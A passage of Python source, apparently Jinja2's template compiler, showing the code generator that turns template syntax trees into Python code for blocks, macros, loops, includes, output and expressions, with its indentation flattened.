elif node.ctx == 'param':
self.identifiers.declared_parameter.add(node.name)
elif node.ctx == 'load' and not \
self.identifiers.is_declared(node.name):
self.identifiers.undeclared.add(node.name)
def visit_If(self, node):
self.visit(node.test)
real_identifiers = self.identifiers
old_names = real_identifiers.declared_locally | \
real_identifiers.declared_parameter
def inner_visit(nodes):
if not nodes:
return set()
self.identifiers = real_identifiers.copy()
for subnode in nodes:
self.visit(subnode)
rv = self.identifiers.declared_locally - old_names
# we have to remember the undeclared variables of this branch
# because we will have to pull them.
real_identifiers.undeclared.update(self.identifiers.undeclared)
self.identifiers = real_identifiers
return rv
body = inner_visit(node.body)
else_ = inner_visit(node.else_ or ())
# the differences between the two branches are also pulled as
# undeclared variables
real_identifiers.undeclared.update(body.symmetric_difference(else_) -
real_identifiers.declared)
# remember those that are declared.
real_identifiers.declared_locally.update(body | else_)
def visit_Macro(self, node):
self.identifiers.declared_locally.add(node.name)
def visit_Import(self, node):
self.generic_visit(node)
self.identifiers.declared_locally.add(node.target)
def visit_FromImport(self, node):
self.generic_visit(node)
for name in node.names:
if isinstance(name, tuple):
self.identifiers.declared_locally.add(name[1])
else:
self.identifiers.declared_locally.add(name)
def visit_Assign(self, node):
"""Visit assignments in the correct order."""
self.visit(node.node)
self.visit(node.target)
def visit_For(self, node):
"""Visiting stops at for blocks. However the block sequence
is visited as part of the outer scope.
"""
self.visit(node.iter)
def visit_CallBlock(self, node):
self.visit(node.call)
def visit_FilterBlock(self, node):
self.visit(node.filter)
def visit_Scope(self, node):
"""Stop visiting at scopes."""
def visit_Block(self, node):
"""Stop visiting at blocks."""
class CompilerExit(Exception):
"""Raised if the compiler encountered a situation where it just
doesn't make sense to further process the code. Any block that
raises such an exception is not further processed.
"""
class CodeGenerator(NodeVisitor):
def __init__(self, environment, name, filename, stream=None,
defer_init=False):
if stream is None:
stream = StringIO()
self.environment = environment
self.name = name
self.filename = filename
self.stream = stream
self.created_block_context = False
self.defer_init = defer_init
# aliases for imports
self.import_aliases = {}
# a registry for all blocks. Because blocks are moved out
# into the global python scope they are registered here
self.blocks = {}
# the number of extends statements so far
self.extends_so_far = 0
# some templates have a rootlevel extends. In this case we
# can safely assume that we're a child template and do some
# more optimizations.
self.has_known_extends = False
# the current line number
self.code_lineno = 1
# registry of all filters and tests (global, not block local)
self.tests = {}
self.filters = {}
# the debug information
self.debug_info = []
self._write_debug_info = None
# the number of new lines before the next write()
self._new_lines = 0
# the line number of the last written statement
self._last_line = 0
# true if nothing was written so far.
self._first_write = True
# used by the `temporary_identifier` method to get new
# unique, temporary identifier
self._last_identifier = 0
# the current indentation
self._indentation = 0
# -- Various compilation helpers
def fail(self, msg, lineno):
"""Fail with a :exc:`TemplateAssertionError`."""
raise TemplateAssertionError(msg, lineno, self.name, self.filename)
def temporary_identifier(self):
"""Get a new unique identifier."""
self._last_identifier += 1
return 't_%d' % self._last_identifier
def buffer(self, frame):
"""Enable buffering for the frame from that point onwards."""
frame.buffer = self.temporary_identifier()
self.writeline('%s = []' % frame.buffer)
def return_buffer_contents(self, frame):
"""Return the buffer contents of the frame."""
if frame.eval_ctx.volatile:
self.writeline('if context.eval_ctx.autoescape:')
self.indent()
self.writeline('return Markup(concat(%s))' % frame.buffer)
self.outdent()
self.writeline('else:')
self.indent()
self.writeline('return concat(%s)' % frame.buffer)
self.outdent()
elif frame.eval_ctx.autoescape:
self.writeline('return Markup(concat(%s))' % frame.buffer)
else:
self.writeline('return concat(%s)' % frame.buffer)
def indent(self):
"""Indent by one."""
self._indentation += 1
def outdent(self, step=1):
"""Outdent by step."""
self._indentation -= step
def start_write(self, frame, node=None):
"""Yield or write into the frame buffer."""
if frame.buffer is None:
self.writeline('yield ', node)
else:
self.writeline('%s.append(' % frame.buffer, node)
def end_write(self, frame):
"""End the writing process started by `start_write`."""
if frame.buffer is not None:
self.write(')')
def simple_write(self, s, frame, node=None):
"""Simple shortcut for start_write + write + end_write."""
self.start_write(frame, node)
self.write(s)
self.end_write(frame)
def blockvisit(self, nodes, frame):
"""Visit a list of nodes as block in a frame. If the current frame
is no buffer a dummy ``if 0: yield None`` is written automatically
unless the force_generator parameter is set to False.
"""
if frame.buffer is None:
self.writeline('if 0: yield None')
else:
self.writeline('pass')
try:
for node in nodes:
self.visit(node, frame)
except CompilerExit:
pass
def write(self, x):
"""Write a string into the output stream."""
if self._new_lines:
if not self._first_write:
self.stream.write('\n' * self._new_lines)
self.code_lineno += self._new_lines
if self._write_debug_info is not None:
self.debug_info.append((self._write_debug_info,
self.code_lineno))
self._write_debug_info = None
self._first_write = False
self.stream.write(' ' * self._indentation)
self._new_lines = 0
self.stream.write(x)
def writeline(self, x, node=None, extra=0):
"""Combination of newline and write."""
self.newline(node, extra)
self.write(x)
def newline(self, node=None, extra=0):
"""Add one or more newlines before the next write."""
self._new_lines = max(self._new_lines, 1 + extra)
if node is not None and node.lineno != self._last_line:
self._write_debug_info = node.lineno
self._last_line = node.lineno
def signature(self, node, frame, extra_kwargs=None):
"""Writes a function call to the stream for the current node.
A leading comma is added automatically. The extra keyword
arguments may not include python keywords otherwise a syntax
error could occour. The extra keyword arguments should be given
as python dict.
"""
# if any of the given keyword arguments is a python keyword
# we have to make sure that no invalid call is created.
kwarg_workaround = False
for kwarg in chain((x.key for x in node.kwargs), extra_kwargs or ()):
if is_python_keyword(kwarg):
kwarg_workaround = True
break
for arg in node.args:
self.write(', ')
self.visit(arg, frame)
if not kwarg_workaround:
for kwarg in node.kwargs:
self.write(', ')
self.visit(kwarg, frame)
if extra_kwargs is not None:
for key, value in extra_kwargs.iteritems():
self.write(', %s=%s' % (key, value))
if node.dyn_args:
self.write(', *')
self.visit(node.dyn_args, frame)
if kwarg_workaround:
if node.dyn_kwargs is not None:
self.write(', **dict({')
else:
self.write(', **{')
for kwarg in node.kwargs:
self.write('%r: ' % kwarg.key)
self.visit(kwarg.value, frame)
self.write(', ')
if extra_kwargs is not None:
for key, value in extra_kwargs.iteritems():
self.write('%r: %s, ' % (key, value))
if node.dyn_kwargs is not None:
self.write('}, **')
self.visit(node.dyn_kwargs, frame)
self.write(')')
else:
self.write('}')
elif node.dyn_kwargs is not None:
self.write(', **')
self.visit(node.dyn_kwargs, frame)
def pull_locals(self, frame):
"""Pull all the references identifiers into the local scope."""
for name in frame.identifiers.undeclared:
self.writeline('l_%s = context.resolve(%r)' % (name, name))
def pull_dependencies(self, nodes):
"""Pull all the dependencies."""
visitor = DependencyFinderVisitor()
for node in nodes:
visitor.visit(node)
for dependency in 'filters', 'tests':
mapping = getattr(self, dependency)
for name in getattr(visitor, dependency):
if name not in mapping:
mapping[name] = self.temporary_identifier()
self.writeline('%s = environment.%s[%r]' %
(mapping[name], dependency, name))
def unoptimize_scope(self, frame):
"""Disable Python optimizations for the frame."""
# XXX: this is not that nice but it has no real overhead. It
# mainly works because python finds the locals before dead code
# is removed. If that breaks we have to add a dummy function
# that just accepts the arguments and does nothing.
if frame.identifiers.declared:
self.writeline('%sdummy(%s)' % (
unoptimize_before_dead_code and 'if 0: ' or '',
', '.join('l_' + name for name in frame.identifiers.declared)
))
def push_scope(self, frame, extra_vars=()):
"""This function returns all the shadowed variables in a dict
in the form name: alias and will write the required assignments
into the current scope. No indentation takes place.
This also predefines locally declared variables from the loop
body because under some circumstances it may be the case that
`extra_vars` is passed to `Frame.find_shadowed`.
"""
aliases = {}
for name in frame.find_shadowed(extra_vars):
aliases[name] = ident = self.temporary_identifier()
self.writeline('%s = l_%s' % (ident, name))
to_declare = set()
for name in frame.identifiers.declared_locally:
if name not in aliases:
to_declare.add('l_' + name)
if to_declare:
self.writeline(' = '.join(to_declare) + ' = missing')
return aliases
def pop_scope(self, aliases, frame):
"""Restore all aliases and delete unused variables."""
for name, alias in aliases.iteritems():
self.writeline('l_%s = %s' % (name, alias))
to_delete = set()
for name in frame.identifiers.declared_locally:
if name not in aliases:
to_delete.add('l_' + name)
if to_delete:
# we cannot use the del statement here because enclosed
# scopes can trigger a SyntaxError:
# a = 42; b = lambda: a; del a
self.writeline(' = '.join(to_delete) + ' = missing')
def function_scoping(self, node, frame, children=None,
find_special=True):
"""In Jinja a few statements require the help of anonymous
functions. Those are currently macros and call blocks and in
the future also recursive loops. As there is currently
technical limitation that doesn't allow reading and writing a
variable in a scope where the initial value is coming from an
outer scope, this function tries to fall back with a common
error message. Additionally the frame passed is modified so
that the argumetns are collected and callers are looked up.
This will return the modified frame.
"""
# we have to iterate twice over it, make sure that works
if children is None:
children = node.iter_child_nodes()
children = list(children)
func_frame = frame.inner()
func_frame.inspect(children)
# variables that are undeclared (accessed before declaration) and
# declared locally *and* part of an outside scope raise a template
# assertion error. Reason: we can't generate reasonable code from
# it without aliasing all the variables.
# this could be fixed in Python 3 where we have the nonlocal
# keyword or if we switch to bytecode generation
overriden_closure_vars = (
func_frame.identifiers.undeclared &
func_frame.identifiers.declared &
(func_frame.identifiers.declared_locally |
func_frame.identifiers.declared_parameter)
)
if overriden_closure_vars:
self.fail('It\'s not possible to set and access variables '
'derived from an outer scope! (affects: %s)' %
', '.join(sorted(overriden_closure_vars)), node.lineno)
# remove variables from a closure from the frame's undeclared
# identifiers.
func_frame.identifiers.undeclared -= (
func_frame.identifiers.undeclared &
func_frame.identifiers.declared
)
# no special variables for this scope, abort early
if not find_special:
return func_frame
func_frame.accesses_kwargs = False
func_frame.accesses_varargs = False
func_frame.accesses_caller = False
func_frame.arguments = args = ['l_' + x.name for x in node.args]
undeclared = find_undeclared(children, ('caller', 'kwargs', 'varargs'))
if 'caller' in undeclared:
func_frame.accesses_caller = True
func_frame.identifiers.add_special('caller')
args.append('l_caller')
if 'kwargs' in undeclared:
func_frame.accesses_kwargs = True
func_frame.identifiers.add_special('kwargs')
args.append('l_kwargs')
if 'varargs' in undeclared:
func_frame.accesses_varargs = True
func_frame.identifiers.add_special('varargs')
args.append('l_varargs')
return func_frame
def macro_body(self, node, frame, children=None):
"""Dump the function def of a macro or call block."""
frame = self.function_scoping(node, frame, children)
# macros are delayed, they never require output checks
frame.require_output_check = False
args = frame.arguments
# XXX: this is an ugly fix for the loop nesting bug
# (tests.test_old_bugs.test_loop_call_bug). This works around
# a identifier nesting problem we have in general. It's just more
# likely to happen in loops which is why we work around it. The
# real solution would be "nonlocal" all the identifiers that are
# leaking into a new python frame and might be used both unassigned
# and assigned.
if 'loop' in frame.identifiers.declared:
args = args + ['l_loop=l_loop']
self.writeline('def macro(%s):' % ', '.join(args), node)
self.indent()
self.buffer(frame)
self.pull_locals(frame)
self.blockvisit(node.body, frame)
self.return_buffer_contents(frame)
self.outdent()
return frame
def macro_def(self, node, frame):
"""Dump the macro definition for the def created by macro_body."""
arg_tuple = ', '.join(repr(x.name) for x in node.args)
name = getattr(node, 'name', None)
if len(node.args) == 1:
arg_tuple += ','
self.write('Macro(environment, macro, %r, (%s), (' %
(name, arg_tuple))
for arg in node.defaults:
self.visit(arg, frame)
self.write(', ')
self.write('), %r, %r, %r)' % (
bool(frame.accesses_kwargs),
bool(frame.accesses_varargs),
bool(frame.accesses_caller)
))
def position(self, node):
"""Return a human readable position for the node."""
rv = 'line %d' % node.lineno
if self.name is not None:
rv += ' in ' + repr(self.name)
return rv
# -- Statement Visitors
def visit_Template(self, node, frame=None):
assert frame is None, 'no root frame allowed'
eval_ctx = EvalContext(self.environment, self.name)
from jinja2.runtime import __all__ as exported
self.writeline('from __future__ import division')
self.writeline('from jinja2.runtime import ' + ', '.join(exported))
if not unoptimize_before_dead_code:
self.writeline('dummy = lambda *x: None')
# if we want a deferred initialization we cannot move the
# environment into a local name
envenv = not self.defer_init and ', environment=environment' or ''
# do we have an extends tag at all? If not, we can save some
# overhead by just not processing any inheritance code.
have_extends = node.find(nodes.Extends) is not None
# find all blocks
for block in node.find_all(nodes.Block):
if block.name in self.blocks:
self.fail('block %r defined twice' % block.name, block.lineno)
self.blocks[block.name] = block
# find all imports and import them
for import_ in node.find_all(nodes.ImportedName):
if import_.importname not in self.import_aliases:
imp = import_.importname
self.import_aliases[imp] = alias = self.temporary_identifier()
if '.' in imp:
module, obj = imp.rsplit('.', 1)
self.writeline('from %s import %s as %s' %
(module, obj, alias))
else:
self.writeline('import %s as %s' % (imp, alias))
# add the load name
self.writeline('name = %r' % self.name)
# generate the root render function.
self.writeline('def root(context%s):' % envenv, extra=1)
# process the root
frame = Frame(eval_ctx)
frame.inspect(node.body)
frame.toplevel = frame.rootlevel = True
frame.require_output_check = have_extends and not self.has_known_extends
self.indent()
if have_extends:
self.writeline('parent_template = None')
if 'self' in find_undeclared(node.body, ('self',)):
frame.identifiers.add_special('self')
self.writeline('l_self = TemplateReference(context)')
self.pull_locals(frame)
self.pull_dependencies(node.body)
self.blockvisit(node.body, frame)
self.outdent()
# make sure that the parent root is called.
if have_extends:
if not self.has_known_extends:
self.indent()
self.writeline('if parent_template is not None:')
self.indent()
self.writeline('for event in parent_template.'
'root_render_func(context):')
self.indent()
self.writeline('yield event')
self.outdent(2 + (not self.has_known_extends))
# at this point we now have the blocks collected and can visit them too.
for name, block in self.blocks.iteritems():
block_frame = Frame(eval_ctx)
block_frame.inspect(block.body)
block_frame.block = name
self.writeline('def block_%s(context%s):' % (name, envenv),
block, 1)
self.indent()
undeclared = find_undeclared(block.body, ('self', 'super'))
if 'self' in undeclared:
block_frame.identifiers.add_special('self')
self.writeline('l_self = TemplateReference(context)')
if 'super' in undeclared:
block_frame.identifiers.add_special('super')
self.writeline('l_super = context.super(%r, '
'block_%s)' % (name, name))
self.pull_locals(block_frame)
self.pull_dependencies(block.body)
self.blockvisit(block.body, block_frame)
self.outdent()
self.writeline('blocks = {%s}' % ', '.join('%r: block_%s' % (x, x)
for x in self.blocks),
extra=1)
# add a function that returns the debug info
self.writeline('debug_info = %r' % '&'.join('%s=%s' % x for x
in self.debug_info))
def visit_Block(self, node, frame):
"""Call a block and register it for the template."""
level = 1
if frame.toplevel:
# if we know that we are a child template, there is no need to
# check if we are one
if self.has_known_extends:
return
if self.extends_so_far > 0:
self.writeline('if parent_template is None:')
self.indent()
level += 1
context = node.scoped and 'context.derived(locals())' or 'context'
self.writeline('for event in context.blocks[%r][0](%s):' % (
node.name, context), node)
self.indent()
self.simple_write('event', frame)
self.outdent(level)
def visit_Extends(self, node, frame):
"""Calls the extender."""
if not frame.toplevel:
self.fail('cannot use extend from a non top-level scope',
node.lineno)
# if the number of extends statements in general is zero so
# far, we don't have to add a check if something extended
# the template before this one.
if self.extends_so_far > 0:
# if we have a known extends we just add a template runtime
# error into the generated code. We could catch that at compile
# time too, but i welcome it not to confuse users by throwing the
# same error at different times just "because we can".
if not self.has_known_extends:
self.writeline('if parent_template is not None:')
self.indent()
self.writeline('raise TemplateRuntimeError(%r)' %
'extended multiple times')
self.outdent()
# if we have a known extends already we don't need that code here
# as we know that the template execution will end here.
if self.has_known_extends:
raise CompilerExit()
self.writeline('parent_template = environment.get_template(', node)
self.visit(node.template, frame)
self.write(', %r)' % self.name)
self.writeline('for name, parent_block in parent_template.'
'blocks.%s():' % dict_item_iter)
self.indent()
self.writeline('context.blocks.setdefault(name, []).'
'append(parent_block)')
self.outdent()
# if this extends statement was in the root level we can take
# advantage of that information and simplify the generated code
# in the top level from this point onwards
if frame.rootlevel:
self.has_known_extends = True
# and now we have one more
self.extends_so_far += 1
def visit_Include(self, node, frame):
"""Handles includes."""
if node.with_context:
self.unoptimize_scope(frame)
if node.ignore_missing:
self.writeline('try:')
self.indent()
func_name = 'get_or_select_template'
if isinstance(node.template, nodes.Const):
if isinstance(node.template.value, basestring):
func_name = 'get_template'
elif isinstance(node.template.value, (tuple, list)):
func_name = 'select_template'
elif isinstance(node.template, (nodes.Tuple, nodes.List)):
func_name = 'select_template'
self.writeline('template = environment.%s(' % func_name, node)
self.visit(node.template, frame)
self.write(', %r)' % self.name)
if node.ignore_missing:
self.outdent()
self.writeline('except TemplateNotFound:')
self.indent()
self.writeline('pass')
self.outdent()
self.writeline('else:')
self.indent()
if node.with_context:
self.writeline('for event in template.root_render_func('
'template.new_context(context.parent, True, '
'locals())):')
else:
self.writeline('for event in template.module._body_stream:')
self.indent()
self.simple_write('event', frame)
self.outdent()
if node.ignore_missing:
self.outdent()
def visit_Import(self, node, frame):
"""Visit regular imports."""
if node.with_context:
self.unoptimize_scope(frame)
self.writeline('l_%s = ' % node.target, node)
if frame.toplevel:
self.write('context.vars[%r] = ' % node.target)
self.write('environment.get_template(')
self.visit(node.template, frame)
self.write(', %r).' % self.name)
if node.with_context:
self.write('make_module(context.parent, True, locals())')
else:
self.write('module')
if frame.toplevel and not node.target.startswith('_'):
self.writeline('context.exported_vars.discard(%r)' % node.target)
frame.assigned_names.add(node.target)
def visit_FromImport(self, node, frame):
"""Visit named imports."""
self.newline(node)
self.write('included_template = environment.get_template(')
self.visit(node.template, frame)
self.write(', %r).' % self.name)
if node.with_context:
self.write('make_module(context.parent, True)')
else:
self.write('module')
var_names = []
discarded_names = []
for name in node.names:
if isinstance(name, tuple):
name, alias = name
else:
alias = name
self.writeline('l_%s = getattr(included_template, '
'%r, missing)' % (alias, name))
self.writeline('if l_%s is missing:' % alias)
self.indent()
self.writeline('l_%s = environment.undefined(%r %% '
'included_template.__name__, '
'name=%r)' %
(alias, 'the template %%r (imported on %s) does '
'not export the requested name %s' % (
self.position(node),
repr(name)
), name))
self.outdent()
if frame.toplevel:
var_names.append(alias)
if not alias.startswith('_'):
discarded_names.append(alias)
frame.assigned_names.add(alias)
if var_names:
if len(var_names) == 1:
name = var_names[0]
self.writeline('context.vars[%r] = l_%s' % (name, name))
else:
self.writeline('context.vars.update({%s})' % ', '.join(
'%r: l_%s' % (name, name) for name in var_names
))
if discarded_names:
if len(discarded_names) == 1:
self.writeline('context.exported_vars.discard(%r)' %
discarded_names[0])
else:
self.writeline('context.exported_vars.difference_'
'update((%s))' % ', '.join(map(repr, discarded_names)))
def visit_For(self, node, frame):
# when calculating the nodes for the inner frame we have to exclude
# the iterator contents from it
children = node.iter_child_nodes(exclude=('iter',))
if node.recursive:
loop_frame = self.function_scoping(node, frame, children,
find_special=False)
else:
loop_frame = frame.inner()
loop_frame.inspect(children)
# try to figure out if we have an extended loop. An extended loop
# is necessary if the loop is in recursive mode if the special loop
# variable is accessed in the body.
extended_loop = node.recursive or 'loop' in \
find_undeclared(node.iter_child_nodes(
only=('body',)), ('loop',))
# if we don't have an recursive loop we have to find the shadowed
# variables at that point. Because loops can be nested but the loop
# variable is a special one we have to enforce aliasing for it.
if not node.recursive:
aliases = self.push_scope(loop_frame, ('loop',))
# otherwise we set up a buffer and add a function def
else:
self.writeline('def loop(reciter, loop_render_func):', node)
self.indent()
self.buffer(loop_frame)
aliases = {}
# make sure the loop variable is a special one and raise a template
# assertion error if a loop tries to write to loop
if extended_loop:
loop_frame.identifiers.add_special('loop')
for name in node.find_all(nodes.Name):
if name.ctx == 'store' and name.name == 'loop':
self.fail('Can\'t assign to special loop variable '
'in for-loop target', name.lineno)
self.pull_locals(loop_frame)
if node.else_:
iteration_indicator = self.temporary_identifier()
self.writeline('%s = 1' % iteration_indicator)
# Create a fake parent loop if the else or test section of a
# loop is accessing the special loop variable and no parent loop
# exists.
if 'loop' not in aliases and 'loop' in find_undeclared(
node.iter_child_nodes(only=('else_', 'test')), ('loop',)):
self.writeline("l_loop = environment.undefined(%r, name='loop')" %
("'loop' is undefined. the filter section of a loop as well "
"as the else block don't have access to the special 'loop'"
" variable of the current loop. Because there is no parent "
"loop it's undefined. Happened in loop on %s" %
self.position(node)))
self.writeline('for ', node)
self.visit(node.target, loop_frame)
self.write(extended_loop and ', l_loop in LoopContext(' or ' in ')
# if we have an extened loop and a node test, we filter in the
# "outer frame".
if extended_loop and node.test is not None:
self.write('(')
self.visit(node.target, loop_frame)
self.write(' for ')
self.visit(node.target, loop_frame)
self.write(' in ')
if node.recursive:
self.write('reciter')
else:
self.visit(node.iter, loop_frame)
self.write(' if (')
test_frame = loop_frame.copy()
self.visit(node.test, test_frame)
self.write('))')
elif node.recursive:
self.write('reciter')
else:
self.visit(node.iter, loop_frame)
if node.recursive:
self.write(', recurse=loop_render_func):')
else:
self.write(extended_loop and '):' or ':')
# tests in not extended loops become a continue
if not extended_loop and node.test is not None:
self.indent()
self.writeline('if not ')
self.visit(node.test, loop_frame)
self.write(':')
self.indent()
self.writeline('continue')
self.outdent(2)
self.indent()
self.blockvisit(node.body, loop_frame)
if node.else_:
self.writeline('%s = 0' % iteration_indicator)
self.outdent()
if node.else_:
self.writeline('if %s:' % iteration_indicator)
self.indent()
self.blockvisit(node.else_, loop_frame)
self.outdent()
# reset the aliases if there are any.
if not node.recursive:
self.pop_scope(aliases, loop_frame)
# if the node was recursive we have to return the buffer contents
# and start the iteration code
if node.recursive:
self.return_buffer_contents(loop_frame)
self.outdent()
self.start_write(frame, node)
self.write('loop(')
self.visit(node.iter, frame)
self.write(', loop)')
self.end_write(frame)
def visit_If(self, node, frame):
if_frame = frame.soft()
self.writeline('if ', node)
self.visit(node.test, if_frame)
self.write(':')
self.indent()
self.blockvisit(node.body, if_frame)
self.outdent()
if node.else_:
self.writeline('else:')
self.indent()
self.blockvisit(node.else_, if_frame)
self.outdent()
def visit_Macro(self, node, frame):
macro_frame = self.macro_body(node, frame)
self.newline()
if frame.toplevel:
if not node.name.startswith('_'):
self.write('context.exported_vars.add(%r)' % node.name)
self.writeline('context.vars[%r] = ' % node.name)
self.write('l_%s = ' % node.name)
self.macro_def(node, macro_frame)
frame.assigned_names.add(node.name)
def visit_CallBlock(self, node, frame):
children = node.iter_child_nodes(exclude=('call',))
call_frame = self.macro_body(node, frame, children)
self.writeline('caller = ')
self.macro_def(node, call_frame)
self.start_write(frame, node)
self.visit_Call(node.call, call_frame, forward_caller=True)
self.end_write(frame)
def visit_FilterBlock(self, node, frame):
filter_frame = frame.inner()
filter_frame.inspect(node.iter_child_nodes())
aliases = self.push_scope(filter_frame)
self.pull_locals(filter_frame)
self.buffer(filter_frame)
self.blockvisit(node.body, filter_frame)
self.start_write(frame, node)
self.visit_Filter(node.filter, filter_frame)
self.end_write(frame)
self.pop_scope(aliases, filter_frame)
def visit_ExprStmt(self, node, frame):
self.newline(node)
self.visit(node.node, frame)
def visit_Output(self, node, frame):
# if we have a known extends statement, we don't output anything
# if we are in a require_output_check section
if self.has_known_extends and frame.require_output_check:
return
if self.environment.finalize:
finalize = lambda x: unicode(self.environment.finalize(x))
else:
finalize = unicode
# if we are inside a frame that requires output checking, we do so
outdent_later = False
if frame.require_output_check:
self.writeline('if parent_template is None:')
self.indent()
outdent_later = True
# try to evaluate as many chunks as possible into a static
# string at compile time.
body = []
for child in node.nodes:
try:
const = child.as_const(frame.eval_ctx)
except nodes.Impossible:
body.append(child)
continue
# the frame can't be volatile here, becaus otherwise the
# as_const() function would raise an Impossible exception
# at that point.
try:
if frame.eval_ctx.autoescape:
if hasattr(const, '__html__'):
const = const.__html__()
else:
const = escape(const)
const = finalize(const)
except Exception:
# if something goes wrong here we evaluate the node
# at runtime for easier debugging
body.append(child)
continue
if body and isinstance(body[-1], list):
body[-1].append(const)
else:
body.append([const])
# if we have less than 3 nodes or a buffer we yield or extend/append
if len(body) < 3 or frame.buffer is not None:
if frame.buffer is not None:
# for one item we append, for more we extend
if len(body) == 1:
self.writeline('%s.append(' % frame.buffer)
else:
self.writeline('%s.extend((' % frame.buffer)
self.indent()
for item in body:
if isinstance(item, list):
val = repr(concat(item))
if frame.buffer is None:
self.writeline('yield ' + val)
else:
self.writeline(val + ', ')
else:
if frame.buffer is None:
self.writeline('yield ', item)
else:
self.newline(item)
close = 1
if frame.eval_ctx.volatile:
self.write('(context.eval_ctx.autoescape and'
' escape or to_string)(')
elif frame.eval_ctx.autoescape:
self.write('escape(')
else:
self.write('to_string(')
if self.environment.finalize is not None:
self.write('environment.finalize(')
close += 1
self.visit(item, frame)
self.write(')' * close)
if frame.buffer is not None:
self.write(', ')
if frame.buffer is not None:
# close the open parentheses
self.outdent()
self.writeline(len(body) == 1 and ')' or '))')
# otherwise we create a format string as this is faster in that case
else:
format = []
arguments = []
for item in body:
if isinstance(item, list):
format.append(concat(item).replace('%', '%%'))
else:
format.append('%s')
arguments.append(item)
self.writeline('yield ')
self.write(repr(concat(format)) + ' % (')
idx = -1
self.indent()
for argument in arguments:
self.newline(argument)
close = 0
if frame.eval_ctx.volatile:
self.write('(context.eval_ctx.autoescape and'
' escape or to_string)(')
close += 1
elif frame.eval_ctx.autoescape:
self.write('escape(')
close += 1
if self.environment.finalize is not None:
self.write('environment.finalize(')
close += 1
self.visit(argument, frame)
self.write(')' * close + ', ')
self.outdent()
self.writeline(')')
if outdent_later:
self.outdent()
def visit_Assign(self, node, frame):
self.newline(node)
# toplevel assignments however go into the local namespace and
# the current template's context. We create a copy of the frame
# here and add a set so that the Name visitor can add the assigned
# names here.
if frame.toplevel:
assignment_frame = frame.copy()
assignment_frame.toplevel_assignments = set()
else:
assignment_frame = frame
self.visit(node.target, assignment_frame)
self.write(' = ')
self.visit(node.node, frame)
# make sure toplevel assignments are added to the context.
if frame.toplevel:
public_names = [x for x in assignment_frame.toplevel_assignments
if not x.startswith('_')]
if len(assignment_frame.toplevel_assignments) == 1:
name = next(iter(assignment_frame.toplevel_assignments))
self.writeline('context.vars[%r] = l_%s' % (name, name))
else:
self.writeline('context.vars.update({')
for idx, name in enumerate(assignment_frame.toplevel_assignments):
if idx:
self.write(', ')
self.write('%r: l_%s' % (name, name))
self.write('})')
if public_names:
if len(public_names) == 1:
self.writeline('context.exported_vars.add(%r)' %
public_names[0])
else:
self.writeline('context.exported_vars.update((%s))' %
', '.join(map(repr, public_names)))
# -- Expression Visitors
def visit_Name(self, node, frame):
if node.ctx == 'store' and frame.toplevel:
frame.toplevel_assignments.add(node.name)
self.write('l_' + node.name)
frame.assigned_names.add(node.name)
def visit_Const(self, node, frame):
val = node.value
if isinstance(val, float):
self.write(str(val))
else:
self.write(repr(val))
def visit_TemplateData(self, node, frame):
try:
self.write(repr(node.as_const(frame.eval_ctx)))
except nodes.Impossible:
self.write('(context.eval_ctx.autoescape and Markup or identity)(%r)'
% node.data)
def visit_Tuple(self, node, frame):
self.write('(')
idx = -1
for idx, item in enumerate(node.items):
if idx:
self.write(', ')
self.visit(item, frame)
self.write(idx == 0 and ',)' or ')')
def visit_List(self, node, frame):
self.write('[')
for idx, item in enumerate(node.items):
if idx:
self.write(', ')
self.visit(item, frame)
self.write(']')
def visit_Dict(self, node, frame):
self.write('{')
for idx, item in enumerate(node.items):
if idx:
self.write(', ')
self.visit(item.key, frame)
self.write(': ')
self.visit(item.value, frame)
self.write('}')
def binop(operator, interceptable=True):
def visitor(self, node, frame):
if self.environment.sandboxed and \
operator in self.environment.intercepted_binops:
self.write('environment.call_binop(context, %r, ' % operator)
self.visit(node.left, frame)
self.write(', ')
self.visit(node.right, frame)
else:
self.write('(')
self.visit(node.left, frame)
self.write(' %s ' % operator)
self.visit(node.right, frame)
self.write(')')
return visitor
def uaop(operator, interceptable=True):
def visitor(self, node, frame):
if self.environment.sandboxed and \
operator in self.environment.intercepted_unops:
self.write('environment.call_unop(context, %r, ' % operator)
self.visit(node.node, frame)
else:
self.write('(' + operator)
self.visit(node.node, frame)
self.write(')')
return visitor
visit_Add = binop('+')
visit_Sub = binop('-')
visit_Mul = binop('*')
visit_Div = binop('/')
visit_FloorDiv = binop('//')
visit_Pow = binop('**')
visit_Mod = binop('%')
visit_And = binop('and', interceptable=False)
visit_Or = binop('or', interceptable=False)
visit_Pos = uaop('+')
visit_Neg = uaop('-')
visit_Not = uaop('not ', interceptable=False)
del binop, uaop
def visit_Concat(self, node, frame):
if frame.eval_ctx.volatile:
func_name = '(context.eval_ctx.volatile and' \
' markup_join or unicode_join)'
elif frame.eval_ctx.autoescape:
func_name = 'markup_join'
else:
func_name = 'unicode_join'
self.write('%s((' % func_name)
for arg in node.nodes:
self.visit(arg, frame)
self.write(', ')
self.write('))')
def visit_Compare(self, node, frame):
self.visit(node.expr, frame)
for op in node.ops:
self.visit(op, frame)
def visit_Operand(self, node, frame):
self.write(' %s ' % operators[node.op])
self.visit(node.expr, frame)
def visit_Getattr(self, node, frame):
self.write('environment.getattr(')
self.visit(node.node, frame)
self.write(', %r)' % node.attr)
def visit_Getitem(self, node, frame):
# slices bypass the environment getitem method.
if isinstance(node.arg, nodes.Slice):
self.visit(node.node, frame)
self.write('[')
self.visit(node.arg, frame)
self.write(']')
else:
self.write('environment.getitem(')
self.visit(node.node, frame)
self.write(', ')
self.visit(node.arg, frame)
self.write(')')
def visit_Slice(self, node, frame):
if node.start is not None:
self.visit(node.start, frame)
self.write(':')
if node.stop is not None:
self.visit(node.stop, frame)
if node.step is not None:
self.write(':')
self.visit(node.step, frame)
def visit_Filter(self, node, frame):
self.write(self.filters[node.name] + '(')
func = self.environment.filters.get(node.name)
if func is None:
self.fail('no filter named %r' % node.name, node.lineno)
if getattr(func, 'contextfilter', False):
self.write('context, ')
elif getattr(func, 'evalcontextfilter', False):
self.write('context.eval_ctx, ')
elif getattr(func, 'environmentfilter', False):
self.write('environment, ')
# if the filter node is None we are inside a filter block
# and want to write to the current buffer
if node.node is not None:
self.visit(node.node, frame)
elif frame.eval_ctx.volatile:
self.write('(context.eval_ctx.autoescape and'
' Markup(concat(%s)) or concat(%s))' %
(frame.buffer, frame.buffer))
elif frame.eval_ctx.autoescape:
self.write('Markup(concat(%s))' % frame.buffer)
else:
self.write('concat(%s)' % frame.buffer)
self.signature(node, frame)
self.write(')')
def visit_Test(self, node, frame):
self.write(self.tests[node.name] + '(')
if node.name not in self.environment.tests:
self.fail('no test named %r' % node.name, node.lineno)
self.visit(node.node, frame)
self.signature(node, frame)
